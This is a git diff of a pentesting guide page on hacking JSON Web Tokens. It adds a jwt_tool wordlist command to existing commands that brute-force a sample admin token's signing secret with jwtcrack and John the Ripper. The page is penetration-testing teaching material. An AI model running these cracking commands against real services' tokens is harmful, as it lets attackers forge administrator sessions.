GitBook: [master] one page modified

carlospolop · gitbook-bot · commit a1fab3d9e247 · 2021-03-08T15:42:07.000Z
diff --git a/pentesting-web/hacking-jwt-json-web-tokens.md b/pentesting-web/hacking-jwt-json-web-tokens.md
@@ -47,13 +47,15 @@ Check if the token lasts more than 24h... maybe it never expires. If there is a
 ```bash
 git clone https://github.com/Sjord/jwtcrack.git
 cd jwtcrack
-
 #Bruteforce using crackjwt.py
 python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
 
 #Bruteforce using john
 python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
 john jwt.john #It does not work with Kali-John
+
+#https://github.com/ticarpi/jwt_tool
+python3 jwt_tool.py -d wordlists.txt <JWT token>
 ```
 
 ## Modify the algorithm to None \(CVE-2015-9235\)
